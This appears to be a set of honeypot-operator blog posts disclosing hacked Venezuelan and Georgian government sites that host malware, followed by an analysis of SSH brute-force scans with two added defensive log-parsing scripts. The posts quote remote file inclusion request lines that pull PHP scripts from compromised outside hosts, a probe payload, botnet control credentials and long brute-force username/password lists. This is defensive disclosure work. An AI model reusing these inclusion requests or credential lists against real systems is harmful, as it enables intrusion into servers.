Venezuela Government site hacked and spreading malware

Since we have been noticing that full-disclosure works, we will continue with that.

Our honeypots have detected that since January the site www.miranda.gov.ve (from the Venezuelan state of Miranda) has been hosting malware, and that its IP address has also been scanning our honeypots.

We attempted to contact them a few times without any reply, so let’s see if anyone will take notice now.

What we saw initially was a few files being used in RFI attacks:

a.b.231.227 - - [16/Feb/2010:01:32:50 -0200] "GET /show.php?path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"
a.b.231.227 - - [16/Feb/2010:01:32:56 -0200] "GET /xxx.php?path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"

Later we also saw them attacking our system (190.9.130.13 is their IP address):

190.9.130.13 - - [19/Feb/2010:06:13:17 -0200] "GET /tonuke.php?filnavn=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"
190.9.130.13 - - [19/Feb/2010:06:13:17 -0200] "GET /xxx.php?filnavn=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"

These are some of the files we found so far:

$ lynx --source --dump http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt
$ lynx --source --dump http://www.miranda.gov.ve/modules/mod_sections/id1.txt
<?php /* Fg21ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fh21ID */

Note that this is just what was reported from our honeypot systems (all automated). We only go deeper in the analysis when our clients are affected.

Also, one thing that most people don’t realize is that if the attackers are able to upload any file to the server and run commands there, they can also steal confidential information and passwords, inject malware into the pages served to visitors (via JavaScript), etc.

Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect.

You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites.

Well, not really. Even after I sent a bunch of emails to all of their addresses that I could find and asked on Twitter for contacts in the .ge government, nobody replied, and they are still hacked, spreading malware and attacking other systems.

It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t deface their web page. They just added some malware and scripts to attack others.

How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?

Analysis

I started seeing the first attacks on January 12th, trying to load remote files (RFI) from psg.gov.ge:

a.b.147.154 - - [12/Jan/2010:14:05:43 -0200] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1" 200 6312 "-" "Mozilla/5.0"
a.b.147.154 - - [12/Jan/2010:14:05:46 -0200] "GET /xxx//?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1" 200 7281 "-" "Mozilla/5.0"

A few days later I started seeing more attacks using malware hosted on www.justice.gov.ge:

a.b.63.102 - - [14/Jan/2010:03:04:23 -0200] "GET /xxx*.php?page=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 200 36 "-" "Mozilla/5.0"

That’s when I decided to look deeper at the issue. The respon1.txt is a common file used in RFI attacks:

$ lynx --dump --source http://www.justice.gov.ge//album/respon1.txt
<?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

Then I went to look at this “album” directory and that really shocked me. When you visit http://www.justice.gov.ge/album/ you can see a full collection of malware:

From http://www.justice.gov.ge/album/bot.txt, which shows the credentials used to control a botnet, to flooding tools and remote shells, they have everything.

servban=array("irc.allnetwork.org","","");
$bot['admin']="E_motz";
$bot['pass']="gila";
$bot['inick']="identnick";
$bot['pnick']="passwordnick";
$bot['basechan']="#vanjava";

A look at the top of the simbah.txt shows a “funny” message: http://www.justice.gov.ge/album/simbah.txt

# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
# % private hackers pwned your box %
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%

Even a remote proxy is there at http://www.justice.gov.ge/album/proxy.tgz

Attacking others

If that was not bad enough, by the end of January I started to see their own IP addresses attacking others:

87.253.63.102 - - [01/Feb/2010:04:41:09 -0200] "GET //include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1" 200 36 "-" "libwww-perl/5.805"
87.253.63.102 - - [01/Feb/2010:04:41:09 -0200] "GET /xxx/include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1" 200 36 "-" "libwww-perl/5.805"
81.95.173.72 - - [23/Jan/2010:16:07:29 -0200] "GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 200 36 "-" "Mozilla/5.0"

So, in the end, we have several sites from the Georgian government hosting malware and these four attacking others:

www.psg.gov.ge – 87.253.63.102 (redirects now to justice.gov.ge)
www.justice.gov.ge – 87.253.63.102
moh.gov.ge – 81.95.173.72
mail.justice.gov.ge – 87.253.63.100

If you have any contact at the Georgian government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.

Honeypot analysis – Looking at SSH scans

An integral part of the Sucuri project is to research and monitor current attacks as a way to improve our defense techniques. To achieve that, we have been running a few honeypots for almost a year, collecting data on the attacks we see and learning from them.

After a year, I think we are ready to start sharing the information we have learned…

The first step was to create a page with information about the systems involved in web attacks. We also maintain two blacklists, updated daily: the first lists the domains that are hosting the malware (PHP and Perl scripts), while the second lists the IP addresses that are actively scanning our honeypots. You can check them out, plus the tools used, at Blacklist and Research based on web attacks.
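The two blacklists described here fall straight out of the RFI log lines quoted in the two posts above: a request whose parameter value is itself a URL gives both the host serving the included script and the client that sent the probe. The following is an added example (not Sucuri’s own tooling) that parses Apache common-log lines adapted from those posts, plus one benign request, and produces both lists; the `192.0.2.10` client and the log sample are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: log lines adapted from the two posts above (the a.b.* prefixes
# are the posts' own anonymisation) plus one benign request for contrast.
SAMPLE_LOG = """\
a.b.231.227 - - [16/Feb/2010:01:32:50 -0200] "GET /show.php?path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"
190.9.130.13 - - [19/Feb/2010:06:13:17 -0200] "GET /tonuke.php?filnavn=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 36 "-" "Mozilla/5.0"
87.253.63.102 - - [01/Feb/2010:04:41:09 -0200] "GET //include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1" 200 36 "-" "libwww-perl/5.805"
81.95.173.72 - - [23/Jan/2010:16:07:29 -0200] "GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 200 36 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Feb/2010:05:00:00 -0200] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache common log format: client, identd, user, [timestamp], "method target proto", status
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A query-string value that is itself a URL is the signature of a remote file inclusion probe.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)


def find_rfi(log_text):
    """Return one (client_ip, parameter, remote_host, remote_url) tuple per RFI attempt."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # not a parseable access-log line
        _path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((m.group("ip"), name, urlsplit(value).hostname, value))
    return hits


def build_blacklists(hits):
    """The two lists described above: hosts serving the included scripts, and the
    client addresses that did the scanning, each with the number of attempts seen."""
    hosting = Counter(host for _, _, host, _ in hits)
    scanners = Counter(ip for ip, _, _, _ in hits)
    return hosting, scanners


if __name__ == "__main__":
    hosting, scanners = build_blacklists(find_rfi(SAMPLE_LOG))
    print("hosting:", hosting.most_common())
    print("scanners:", scanners.most_common())
```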

Now, the second step is to write about the attacks we are seeing to help educate others…

Looking at SSH scans

All our honeypots run a modified SSH server where we collect every connection attempt, the user name and password used, and everything typed if the attacker gets access via SSH. Over the course of one year, we recorded more than 1,600 different SSH scans against our systems. The data below covers only the last few months, and the first number on each line is the count of different scans in which that entry was logged.

TOP 50 user/password combinations

# USER, PASS
16 oracle, oracle
13 root, root
12 root, abc123
12 root, 123456
11 tester, test
10 uploader, uploader
10 test123, spam
10 qwerty, testuser
10 qazwsxedc, tester
10 password, test1
10 password, john
10 password, cstrike
10 123456, testuser
10 123456, test2
10 123456, raqbackup
10 123456, gamer
10 123456, cvsadm
10 123456, calendar
10 123456, bill
9 root, 123qwe
9 mike, mike
9 agata, agata
8 test, test123
8 root, qwerty
8 marketing, marketing
8 johan, johan
8 joan, joan
8 ftp, ftp123
8 ftp, ftp
8 carla, carla
8 bruno, bruno
8 admin, admin
8 123, user
7 test, test
7 tech, tech
7 root, password
7 ronaldo, ronaldo
7 raimundo, raimundo
7 nick, nick
7 max, max
7 library, library
7 jeff, jeff
7 internet, internet
7 hans, hans
7 grace, grace
7 ftp, ftpuser
7 frank, frank
7 francisco, francisco
7 francis, francis

It is interesting to note that the first column is the user name, yet we see many entries with 123456 as the user name and testuser or bill as the password. My guess? Someone messed up the password lists and inverted the order. Anyone have ideas?

Top 50 user names used

# USER
241 root
221 password
100 admin
87 test
87 qwerty
72 www
68 123
67 000000
66 111111
65 1234567
63 asdfgh
59 testing
59 test123
58 abc123
53 pass123
52 qazwsx
50 tester
48 server
47 abcdef
46 testing123
46 testing1
46 qazwsxedc
45 zxcvbnm
45 zxcvbn
45 testtest
40 oracle
39 ftp
33 test1
32 passwd
31 tester123
31 tester1
31 pass
30 pgsql
29 operator
28 dan
27 administrator
26 master
26 bin
25 oper
24 nobody
22 backup
21 postgres
21 mail
21 daemon
21 87654321
21 654321
20 office
19 test2
18 ts
17 mike
17 guest
16 monica

TOP 50 Passwords used

# PASS
1427 root
346 test
305 123456
264 testuser
259 tester
242 test123
241 testing
240 test1
236 test2
230 test4
230 test3
113 12345
106 admin
75 user
69 nobody
69 123
65 1234
63 nick
59 webadmin
50 webmaster
49 oracle
48 web
46 password
43 news
42 info
40 sysadm
37 mysql
36 eqidemo
36 cvsadm
34 spam
31 administrator
30 uploader
28 lp
27 system
27 john
27 jack
27 fred
27 bill
26 visitor
26 daily
26 cstrike
25 techsupport
25 sql
25 smtp
23 qwerty
23 michael
22 weblogic
22 webalizer
22 toor
22 sys

Complex passwords logged

Most of the scan attempts used very common passwords, but some of them had really complex passwords, which I can only imagine are used as backdoors or as default passwords for some common systems. Anyone have clues? I googled them and didn’t find anything.

# USER, PASS
5 software, cvsroot
5 soft123, sourceforge
5 rosymdelfin, conautoveracruz
1 root, tiganilaflorinteleorman
1 belltrix, spaf@r?_ene59p9e9rewr*katr
1 tiganilaflorinteleorman, root
1 morrigan, siamouziesw7unla70lafrl3t0l3frle4lu
1 sadmin, &thecentercannothold;&
1 saddleman357, safe
1 sachin, f9uthlavIaPhlawroEXi
1 admin, b#5rum$ph!r!Keyufawre?a3r6
1 miquelfi, B|*Nsq|TO$~b
1 root, an0th3rd@y
1 admin, 63375312012a
1 root, zEfrephaq5qAnedufrethekuW
1 root, z1x2c3v4b5n6
1 root, xsw21qaz
1 root, wiu2ludrlamoatiuTriu
1 root, teiubescdartunumaiubestiasacahaidesaterminam
1 root, siamouziesw7UNla70lafrl3t0l3frlE4lU
1 root, rough46road15
1 root, fiatmx1q2w3e
1 root, empire12
1 root, efKO1$4?
1 root, eempire99
1 root, discovery
1 root, dave
1 root, d3lt4f0rc3
1 root, celes3cat
1 root, bleCroujouwLUswOEdrlAfo6w
1 root, bUspamaxegEGuyU52PEt6estU
1 root, asdfghjkl
1 root, apple
1 root, apache
1 root, an0th3rd@y
1 root, admin321321
1 root, admin1
1 root, admin
1 root, abcd1234
1 root, a1s2d3f4g5h6
1 root, WrIaRoeThIespOeh3AwriufLetiu7Tlu11u
1 root, QT3CUCCj
1 root, Pr99*35a!ra-EwruvU3E@rAtUk
1 root, N6a4t4u8OEwiaW8i7HLaqLaki
1 root, Liteon81
1 root, B_$Aj3y3#UCraveVE5e23er@P4
1 root, BP5FbGRr
1 root, 63375312012a
1 root, 1z2x3c4v5b6n
1 root, 1qaz2wsx
1 root, 1q2w3e4r5t6y
1 root, 1q2w3e4r5t
1 root, 1q2w3e4r
1 root, 1a2s3d4f5g6hy
1 root, +#SGU9&rbf-;#
1 root, !@#$%^&*(
1 root, !@#$%
1 root, !@#$
1 root, !@#
1 root, +#sgu9&rbf-;#
1 root, )(*&^%$#@!
1 root, &thecentercannothold;&
1 root, %5%7%4%5%1%4%8%7
1 oracle, $changeme$
1 nobody, $changeme$
1 news, $changeme$
1 $ passwd
1 root, !@#$%^&*()
1 root, !!!
1 qeqawrexudaducu7eyuswacez, root
1 qazwsxeds, root
1 qazwsxedc, root
1 qazwsx, user
1 q16060502141279, q16060502141279
1 pr99*35a!ra-ewruvu3e@ratuk, admin
1 n6a4t4u8oewiaw8i7hlaqlaki, root
1 admin, miemleh9esplawriuthiewias
1 admin, J34a47nu
1 zefrephaq5qanedufrethekuw, sadmin
1 zander, zechsmerquise88
1 root, zaxscd13524
1 zander, zechsmerquise88
1 yxwvutseqponmlkjihgfedcba, root
1 yuneneli, z11060510412854
1 yourdotw, ip46262
1 xgridagent, xgridcontroller
1 xj050i7bfa, root
1 wriaroethiespoeh3awriufletiu7tlu11u, kjetter
1 root, wolfiz0r@
1 admin, wolfiz0r@
1 wmassma, wolf
1 wlp, wmassma
1 wlan, wlp
1 wkoweg, wlan
1 root, wiu2ludrlamoatiutriu
1 ups650cl, lbjlive
1 root, unlocker
1 u33977059, ubuntu
1 u231006, u33977059
1 u208417, u231006
1 u207114, u208417
1 tyson, u207114
1 ska, skandinavia
1 sjfconsulting, ska
1 sjaekel, sjfconsulting
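The three tables above are all the same computation over the honeypot’s login records (the number of distinct scans in which a pair, a user name or a password appeared), and the inverted-list observation and the complex-password list are filters over the same data. The following is an added example, not the post’s own tooling, that reproduces those counts over a constructed sample of (scan_id, user, password) records and flags the two patterns; the scan ids and the `is_complex` threshold are assumptions made here.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of honeypot SSH login attempts as (scan_id, user, password).
# A scan id groups the attempts of one brute-force session, so counting distinct
# ids per entry reproduces the "number of different scans" column of the tables above.
ATTEMPTS = [
    ("s1", "root", "root"), ("s1", "root", "123456"), ("s1", "oracle", "oracle"),
    ("s2", "root", "root"), ("s2", "oracle", "oracle"), ("s2", "oracle", "oracle"),
    ("s3", "123456", "testuser"), ("s3", "password", "test1"), ("s3", "qwerty", "testuser"),
    ("s4", "root", "zEfrephaq5qAnedufrethekuW"), ("s4", "root", "abc123"),
    ("s5", "tiganilaflorinteleorman", "root"), ("s5", "root", "tiganilaflorinteleorman"),
]


def scans_per(attempts, key):
    """Count distinct scan ids per entry; key picks the pair, the user or the password."""
    seen = defaultdict(set)
    for scan, user, pw in attempts:
        seen[key(user, pw)].add(scan)
    return Counter({k: len(v) for k, v in seen.items()})


def top_pairs(attempts, n=50):
    return scans_per(attempts, lambda u, p: (u, p)).most_common(n)


def top_users(attempts, n=50):
    return scans_per(attempts, lambda u, p: u).most_common(n)


def top_passwords(attempts, n=50):
    return scans_per(attempts, lambda u, p: p).most_common(n)


def inverted_pairs(attempts):
    """Pairs that also occur reversed (user as password and password as user): the
    footprint of a swapped wordlist, like the 123456/testuser entries in the table."""
    pairs = {(u, p) for _, u, p in attempts}
    return sorted(pair for pair in pairs if pair[0] != pair[1] and pair[::-1] in pairs)


CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def is_complex(pw):
    """Heuristic assumed here (not the post's): long, or medium length with 3+ character classes."""
    classes = sum(1 for c in CLASSES if re.search(c, pw))
    return len(pw) >= 16 or (len(pw) >= 10 and classes >= 3)


def complex_passwords(attempts):
    return sorted({pw for _, _, pw in attempts if is_complex(pw)})
```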

That’s it. If you want me to run more queries or generate more stats, let me know and I will update this post.